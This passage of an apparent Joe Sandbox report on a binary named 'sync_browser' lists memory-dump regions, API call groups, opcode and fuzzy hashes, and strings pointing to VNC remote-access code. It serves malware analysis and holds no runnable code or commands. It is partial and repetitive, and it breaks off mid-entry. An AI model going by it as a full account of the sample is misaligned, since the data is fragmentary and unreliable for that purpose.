                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 2819658684-0
                                                                    • Opcode ID: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
                                                                    • Instruction ID: eddb2292154b9a08c5d70a7383dfe4c818d02493004d3bfd6477650251af7d95
                                                                    • Opcode Fuzzy Hash: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
                                                                    • Instruction Fuzzy Hash: 0F215021E1D66B85FB515B219C0137E6299AF45BC0F445432EA8DC7BC5DE2CE427A700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize
                                                                    • String ID:
                                                                    • API String ID: 948891078-0
                                                                    • Opcode ID: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
                                                                    • Instruction ID: b69754f4fe90dfa261b09a524cedd2c7a11c3c9b22179fb26819b369eeac6e82
                                                                    • Opcode Fuzzy Hash: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
                                                                    • Instruction Fuzzy Hash: B0214172A1CB5982E7108F69E85426E73A4FB88B54F501232EBAEC3794DF7DD456CB00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Global$FreeUnlock
                                                                    • String ID:
                                                                    • API String ID: 1239146723-0
                                                                    • Opcode ID: abdc864418634cf1197187ec179a29c8207377b801291dd9a7c0c602e8c7d055
                                                                    • Instruction ID: 9629e48fc59a5529ceb0fb79504f082d567bf11d6936a8eb95804861728e35a2
                                                                    • Opcode Fuzzy Hash: abdc864418634cf1197187ec179a29c8207377b801291dd9a7c0c602e8c7d055
                                                                    • Instruction Fuzzy Hash: B6213D31A19A6981FB009F51F85016C63A8FF84B88F180436EA5DC7759CF7CD8A38740
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Write$ConsoleDebugFileHandleOutputString
                                                                    • String ID:
                                                                    • API String ID: 1934604790-0
                                                                    • Opcode ID: aa49c59b5da7e2634850ce4aacb17eb8463b37466091e8bd9ee96f81ef6cd0f2
                                                                    • Instruction ID: a796bc25ae7945ebf450e1f27a8a94e0027f83c1df68db5f3324fa19516ac4d8
                                                                    • Opcode Fuzzy Hash: aa49c59b5da7e2634850ce4aacb17eb8463b37466091e8bd9ee96f81ef6cd0f2
                                                                    • Instruction Fuzzy Hash: C611BF25608AA440E7508B39A8043ADB7A5EB45FB4F584326EEBD47BD8CF3CC4A7C300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _amsg_exit$_getptd_lockfree
                                                                    • String ID:
                                                                    • API String ID: 2148533958-0
                                                                    • Opcode ID: 67261a7475787b32431de27056b085c578b22756a177dc977607e34beed0a1e5
                                                                    • Instruction ID: bc8f87a0d095b434c16d962082544419fe64ffc8871039a6522f27867ffaa416
                                                                    • Opcode Fuzzy Hash: 67261a7475787b32431de27056b085c578b22756a177dc977607e34beed0a1e5
                                                                    • Instruction Fuzzy Hash: 78117C22A1DA6992FA849B11DD40BBD7268FF48740F490137EA0E83395CF3CE476C741
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$CreateEnterErrorExceptionLastLeaveRaiseSemaphore
                                                                    • String ID:
                                                                    • API String ID: 1747828912-0
                                                                    • Opcode ID: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
                                                                    • Instruction ID: a6e335cfa493dcab33257559a051291e5cc0b40138caecbf96d8b2e22e33fd2b
                                                                    • Opcode Fuzzy Hash: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
                                                                    • Instruction Fuzzy Hash: D0111A72A28B6997E7048F25EA8415D77A8FB48B90F10513BEB5D83B50CF78E476CB40
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32 ref: 00007FF6DC0E92F0
                                                                      • Part of subcall function 00007FF6DC157520: EnterCriticalSection.KERNEL32 ref: 00007FF6DC157534
                                                                      • Part of subcall function 00007FF6DC157520: ReleaseSemaphore.KERNEL32 ref: 00007FF6DC157577
                                                                      • Part of subcall function 00007FF6DC157520: GetLastError.KERNEL32 ref: 00007FF6DC157581
                                                                      • Part of subcall function 00007FF6DC157520: LeaveCriticalSection.KERNEL32 ref: 00007FF6DC15758C
                                                                      • Part of subcall function 00007FF6DC157400: EnterCriticalSection.KERNEL32 ref: 00007FF6DC157427
                                                                      • Part of subcall function 00007FF6DC157400: LeaveCriticalSection.KERNEL32 ref: 00007FF6DC157472
                                                                      • Part of subcall function 00007FF6DC157400: LeaveCriticalSection.KERNEL32 ref: 00007FF6DC15747B
                                                                      • Part of subcall function 00007FF6DC157400: WaitForSingleObject.KERNEL32 ref: 00007FF6DC15748A
                                                                      • Part of subcall function 00007FF6DC157400: EnterCriticalSection.KERNEL32 ref: 00007FF6DC157495
                                                                      • Part of subcall function 00007FF6DC157400: GetLastError.KERNEL32 ref: 00007FF6DC1574A7
                                                                      • Part of subcall function 00007FF6DC157400: EnterCriticalSection.KERNEL32 ref: 00007FF6DC1574DE
                                                                      • Part of subcall function 00007FF6DC157400: LeaveCriticalSection.KERNEL32 ref: 00007FF6DC157500
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$Enter$Leave$ErrorLast$ObjectReleaseSemaphoreSingleWait
                                                                    • String ID: b$vncclient.cpp : disable update thread$vncclient.cpp : enable/disable synced
                                                                    • API String ID: 1962697109-2518527632
                                                                    • Opcode ID: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
                                                                    • Instruction ID: a961e607f9ad4f3598ca706926c01f5a2b04a0e142d27759faae9923d83d04a5
                                                                    • Opcode Fuzzy Hash: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
                                                                    • Instruction Fuzzy Hash: 41118E71A28A8682EB048F25E8003FD2365FB84BA4F084236DA1EC73E9DF3CD416C710
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$DeleteEnterEventLeave
                                                                    • String ID:
                                                                    • API String ID: 3772564070-0
                                                                    • Opcode ID: 678031ac42c66a5cc385a0b69a6c3c5d1fab056847b98d7cff6dccc56ed1addc
                                                                    • Instruction ID: 980fb3bad25d843529a95ef36392b854b8caadc6f35240dca13735706287b91e
                                                                    • Opcode Fuzzy Hash: 678031ac42c66a5cc385a0b69a6c3c5d1fab056847b98d7cff6dccc56ed1addc
                                                                    • Instruction Fuzzy Hash: 1C21D625A2DF5A82FB15DB15E99437C23A0AF98B44F540133C90EC6BA1CF7DA4A7C702
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Escape$Release
                                                                    • String ID:
                                                                    • API String ID: 2350829361-0
                                                                    • Opcode ID: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
                                                                    • Instruction ID: 548bf98d32a96d0c5923930e27b436b33030ec934dc6522082737c4fb8330ab4
                                                                    • Opcode Fuzzy Hash: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
                                                                    • Instruction Fuzzy Hash: BCF06D3261865583EB209B20BD55A2EB2A5FB88784F544136DE5E42E24CE3CD022CB04
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _amsg_exit_getptd$_lock
                                                                    • String ID:
                                                                    • API String ID: 3670291111-0
                                                                    • Opcode ID: a8d2708ae87b95b4ee220a0a01a88b12f7926cd03621c5a20977671bdb7db4c5
                                                                    • Instruction ID: 662dc0ed30f9758884ef096cebab0c83f3eca0855b41203f6eb26328d1d763ba
                                                                    • Opcode Fuzzy Hash: a8d2708ae87b95b4ee220a0a01a88b12f7926cd03621c5a20977671bdb7db4c5
                                                                    • Instruction Fuzzy Hash: 8EF04921E0E02AE5FA54AB12CC41FBC1A68EF45B00F88023BEA0C873D2DE1CA476D711
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: htonl
                                                                    • String ID: .$.
                                                                    • API String ID: 2009864989-3769392785
                                                                    • Opcode ID: ca89c10cae28c705ea3385c970d3d674c35f6ab879636ad9786b4f134b09557f
                                                                    • Instruction ID: 72d11cc78c9c6e69b28e92aea4df25528411949d9f82227e00161f8116a6d3c9
                                                                    • Opcode Fuzzy Hash: ca89c10cae28c705ea3385c970d3d674c35f6ab879636ad9786b4f134b09557f
                                                                    • Instruction Fuzzy Hash: 89411551E0C2AA48F7205A76DA5027E7AD85F42754F386133DE6AC22C7CF3ED4278321
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocDeleteFileGlobal_errno_invalid_parameter_noinfo
                                                                    • String ID: !UVNCDIR-
                                                                    • API String ID: 2642416944-2720985186
                                                                    • Opcode ID: 06c9f7cff8713e7e821de9c1934e86ea9f9c841a539949df6008114534a2a042
                                                                    • Instruction ID: ce3883a1f788466e4d51938962a566408054dee73214793604285093f36569fa
                                                                    • Opcode Fuzzy Hash: 06c9f7cff8713e7e821de9c1934e86ea9f9c841a539949df6008114534a2a042
                                                                    • Instruction Fuzzy Hash: 5641933161CBC581EB268B20E8143FD6795EB86B80F445172DA9D877C6DF2DD62BC700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                    • String ID: B
                                                                    • API String ID: 2959964966-1255198513
                                                                    • Opcode ID: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
                                                                    • Instruction ID: afdd3747990cd206b8001c34637dfc1baa052a9d10fa6cf5f835a9492913d573
                                                                    • Opcode Fuzzy Hash: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
                                                                    • Instruction Fuzzy Hash: 5B315F32E1863AC9E7119F65E8405AD36A8BB087A8F540137EE1D93BD8DE38D467D700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                    • String ID: SecureVNC;0;0x%08x;%s
                                                                    • API String ID: 2959964966-2465057312
                                                                    • Opcode ID: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
